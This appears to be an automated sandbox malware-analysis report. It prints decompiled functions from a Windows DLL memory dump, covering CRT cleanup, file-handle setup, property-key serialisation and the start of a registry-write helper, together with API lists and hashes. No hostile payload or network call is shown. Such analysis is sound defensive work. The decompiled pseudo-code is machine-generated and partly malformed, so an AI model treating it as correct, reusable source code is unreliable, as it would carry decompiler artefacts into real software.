                                                      Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}












                                                      0x10007337
                                                      0x1000733f
                                                      0x10007345
                                                      0x1000734b
                                                      0x1000734f
                                                      0x10007351
                                                      0x10007358
                                                      0x1000735e
                                                      0x10007361
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10007361
                                                      0x10007363
                                                      0x10007363
                                                      0x10007369
                                                      0x1000736b
                                                      0x10007370
                                                      0x10007379
                                                      0x10007381
                                                      0x10007383
                                                      0x10007389
                                                      0x1000738f
                                                      0x10007392
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10007392
                                                      0x10007394
                                                      0x10007394
                                                      0x1000739b
                                                      0x100073a6
                                                      0x100073ac
                                                      0x100073b7
                                                      0x100073bf
                                                      0x100073c5
                                                      0x100073ce
                                                      0x100073d1
                                                      0x100073d6
                                                      0x100073d8
                                                      0x100073de
                                                      0x100073e3
                                                      0x100073ea
                                                      0x100073ed
                                                      0x100073f3
                                                      0x100073f3
                                                      0x100073f9
                                                      0x10007400
                                                      0x10007403
                                                      0x10007409
                                                      0x10007409
                                                      0x10007415
                                                      0x1000741e
                                                      0x10007420
                                                      0x1000742c
                                                      0x1000742f
                                                      0x10007435
                                                      0x00000000
                                                      0x10007435
                                                      0x1000742c
                                                      0x1000743d

                                                      APIs
                                                      • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                                      • _free.LIBCMT ref: 10007358
                                                        • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                                        • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                                      • _free.LIBCMT ref: 1000736B
                                                      • _free.LIBCMT ref: 10007389
                                                      • _free.LIBCMT ref: 1000739B
                                                      • _free.LIBCMT ref: 100073AC
                                                      • _free.LIBCMT ref: 100073B7
                                                      • _free.LIBCMT ref: 100073D1
                                                      • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                                      • _free.LIBCMT ref: 100073ED
                                                      • _free.LIBCMT ref: 10007403
                                                      • InterlockedDecrement.KERNEL32 ref: 10007415
                                                      • _free.LIBCMT ref: 1000742F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                      • String ID:
                                                      • API String ID: 4264854383-0
                                                      • Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                                      • Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
                                                      • Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                                      • Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 55%
                                                      			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0x5da49213
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}
















































                                                      0x10002f79
                                                      0x10002f80
                                                      0x10002f85
                                                      0x10002f89
                                                      0x10002f9a
                                                      0x10002f9c
                                                      0x10002fa4
                                                      0x10002fb1
                                                      0x10002fb9
                                                      0x10003285
                                                      0x10003295
                                                      0x10002fd7
                                                      0x10002fd7
                                                      0x10002fda
                                                      0x10002fe0
                                                      0x10002fee
                                                      0x10002ff6
                                                      0x10003272
                                                      0x10003277
                                                      0x1000327d
                                                      0x00000000
                                                      0x10003283
                                                      0x10002ffc
                                                      0x10003002
                                                      0x10003009
                                                      0x10003017
                                                      0x1000301d
                                                      0x10003023
                                                      0x10003027
                                                      0x1000307e
                                                      0x1000307e
                                                      0x10003264
                                                      0x10003264
                                                      0x1000326d
                                                      0x00000000
                                                      0x1000326d
                                                      0x1000309c
                                                      0x100030a1
                                                      0x100030a8
                                                      0x10003258
                                                      0x10003258
                                                      0x10003261
                                                      0x00000000
                                                      0x10003261
                                                      0x100030b2
                                                      0x100030bc
                                                      0x100031fe
                                                      0x1000320d
                                                      0x10003215
                                                      0x1000321b
                                                      0x1000321f
                                                      0x00000000
                                                      0x00000000
                                                      0x10003221
                                                      0x10003227
                                                      0x10003237
                                                      0x1000323a
                                                      0x1000323e
                                                      0x1000324c
                                                      0x1000324c
                                                      0x10003255
                                                      0x00000000
                                                      0x10003255
                                                      0x10003240
                                                      0x10003240
                                                      0x10003249
                                                      0x00000000
                                                      0x10003249
                                                      0x100030dd
                                                      0x100030e2
                                                      0x100030e6
                                                      0x00000000
                                                      0x00000000
                                                      0x100030ec
                                                      0x100030f2
                                                      0x100030f9
                                                      0x1000310b
                                                      0x1000310d
                                                      0x10003111
                                                      0x00000000
                                                      0x00000000
                                                      0x1000311e
                                                      0x10003128
                                                      0x10003130
                                                      0x10003138
                                                      0x1000313d
                                                      0x10003144
                                                      0x10003157
                                                      0x1000315a
                                                      0x10003162
                                                      0x1000316a
                                                      0x1000316f
                                                      0x10003175
                                                      0x1000317c
                                                      0x1000317e
                                                      0x10003184
                                                      0x1000318c
                                                      0x10003198
                                                      0x1000319c
                                                      0x100031a5
                                                      0x100031aa
                                                      0x100031b0
                                                      0x100031b4
                                                      0x100031b6
                                                      0x100031bc
                                                      0x100031c4
                                                      0x100031d0
                                                      0x100031d4
                                                      0x100031dd
                                                      0x100031e8
                                                      0x100031e8
                                                      0x100031f1
                                                      0x100031f1
                                                      0x100031fa
                                                      0x100031fa
                                                      0x00000000
                                                      0x10003144
                                                      0x10003029
                                                      0x1000302c
                                                      0x10003033
                                                      0x10003045
                                                      0x1000304b
                                                      0x1000304f
                                                      0x00000000
                                                      0x00000000
                                                      0x10003055
                                                      0x1000305b
                                                      0x1000306b
                                                      0x1000306e
                                                      0x10003070
                                                      0x10003079
                                                      0x1000307c
                                                      0x00000000
                                                      0x1000307c

                                                      APIs
                                                      • _memset.LIBCMT ref: 10002F9C
                                                      • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                                        • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                        • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                        • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                        • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                        • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                        • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                                      • VariantClear.OLEAUT32(?), ref: 100031F1
                                                      • VariantClear.OLEAUT32(?), ref: 100031FA
                                                      • CoTaskMemFree.OLE32(?), ref: 1000327D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                                      • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                                      • API String ID: 2822920939-4160240301
                                                      • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                                      • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                                      • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                                      • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}




























                                                      0x10007719
                                                      0x1000771b
                                                      0x10007720
                                                      0x10007727
                                                      0x1000772d
                                                      0x1000772f
                                                      0x10007738
                                                      0x10007758
                                                      0x1000775c
                                                      0x1000775d
                                                      0x1000775e
                                                      0x10007765
                                                      0x10007767
                                                      0x1000776c
                                                      0x10007785
                                                      0x1000778a
                                                      0x10007790
                                                      0x10007799
                                                      0x1000779f
                                                      0x100077a2
                                                      0x100077a5
                                                      0x100077ae
                                                      0x100077b1
                                                      0x100077b7
                                                      0x100077ba
                                                      0x100077bd
                                                      0x100077c0
                                                      0x100077c3
                                                      0x100077c3
                                                      0x100077ce
                                                      0x100077d9
                                                      0x10007908
                                                      0x10007908
                                                      0x10007908
                                                      0x1000790e
                                                      0x00000000
                                                      0x00000000
                                                      0x10007919
                                                      0x1000791f
                                                      0x10007925
                                                      0x1000793a
                                                      0x10007940
                                                      0x10007947
                                                      0x1000794c
                                                      0x1000794e
                                                      0x10007942
                                                      0x10007944
                                                      0x10007944
                                                      0x10007958
                                                      0x1000795d
                                                      0x100079a4
                                                      0x100079aa
                                                      0x100079ad
                                                      0x100079b3
                                                      0x100079ba
                                                      0x100079bf
                                                      0x100079bf
                                                      0x00000000
                                                      0x10007963
                                                      0x10007964
                                                      0x1000796c
                                                      0x00000000
                                                      0x00000000
                                                      0x1000796e
                                                      0x10007970
                                                      0x10007978
                                                      0x10007985
                                                      0x10007990
                                                      0x10007995
                                                      0x10007999
                                                      0x1000799f
                                                      0x00000000
                                                      0x1000799f
                                                      0x1000798b
                                                      0x1000798d
                                                      0x1000798d
                                                      0x00000000
                                                      0x1000798d
                                                      0x1000797e
                                                      0x00000000
                                                      0x1000797e
                                                      0x1000792c
                                                      0x10007932
                                                      0x100079c6
                                                      0x100079c6
                                                      0x00000000
                                                      0x100079c6
                                                      0x10007925
                                                      0x100079cc
                                                      0x100079d3
                                                      0x1000774d
                                                      0x1000774f
                                                      0x10007750
                                                      0x10007755
                                                      0x10007755
                                                      0x100077df
                                                      0x100077e4
                                                      0x00000000
                                                      0x00000000
                                                      0x100077ea
                                                      0x100077ec
                                                      0x100077ef
                                                      0x100077f2
                                                      0x100077f7
                                                      0x10007801
                                                      0x10007803
                                                      0x10007805
                                                      0x10007805
                                                      0x1000780a
                                                      0x1000780b
                                                      0x1000780e
                                                      0x10007820
                                                      0x10007822
                                                      0x10007827
                                                      0x100078bb
                                                      0x100078c2
                                                      0x100078c8
                                                      0x100078d8
                                                      0x100078de
                                                      0x100078e1
                                                      0x100078e4
                                                      0x100078e8
                                                      0x100078ee
                                                      0x100078f1
                                                      0x100078f4
                                                      0x100078f7
                                                      0x100078f7
                                                      0x100078fc
                                                      0x100078fd
                                                      0x10007900
                                                      0x00000000
                                                      0x10007900
                                                      0x1000782d
                                                      0x10007833
                                                      0x00000000
                                                      0x10007833
                                                      0x10007836
                                                      0x10007838
                                                      0x1000783b
                                                      0x1000783e
                                                      0x10007841
                                                      0x10007849
                                                      0x1000784e
                                                      0x100078a8
                                                      0x100078a8
                                                      0x100078a9
                                                      0x100078af
                                                      0x100078b0
                                                      0x100078b3
                                                      0x100078b6
                                                      0x00000000
                                                      0x10007855
                                                      0x10007855
                                                      0x10007859
                                                      0x00000000
                                                      0x00000000
                                                      0x1000785d
                                                      0x1000786d
                                                      0x1000787a
                                                      0x10007881
                                                      0x10007886
                                                      0x1000788d
                                                      0x10007895
                                                      0x10007899
                                                      0x1000789f
                                                      0x100078a2
                                                      0x100078a5
                                                      0x100078a5
                                                      0x00000000
                                                      0x100078a5
                                                      0x10007860
                                                      0x10007866
                                                      0x1000786b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000786b
                                                      0x1000784e
                                                      0x00000000
                                                      0x10007841
                                                      0x10007779
                                                      0x10007781
                                                      0x00000000
                                                      0x10007781
                                                      0x10007745
                                                      0x00000000

                                                      APIs
                                                      • __lock.LIBCMT ref: 10007727
                                                        • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                                        • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                                        • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                                      • __calloc_crt.LIBCMT ref: 1000775E
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
                                                      • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                                      • __calloc_crt.LIBCMT ref: 10007819
                                                      • GetFileType.KERNEL32 ref: 10007860
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                                      • GetFileType.KERNEL32 ref: 10007964
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 301580142-0
                                                      • Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                                      • Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
                                                      • Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                                      • Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85registrystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 55%
                                                      			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0x5da49213
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
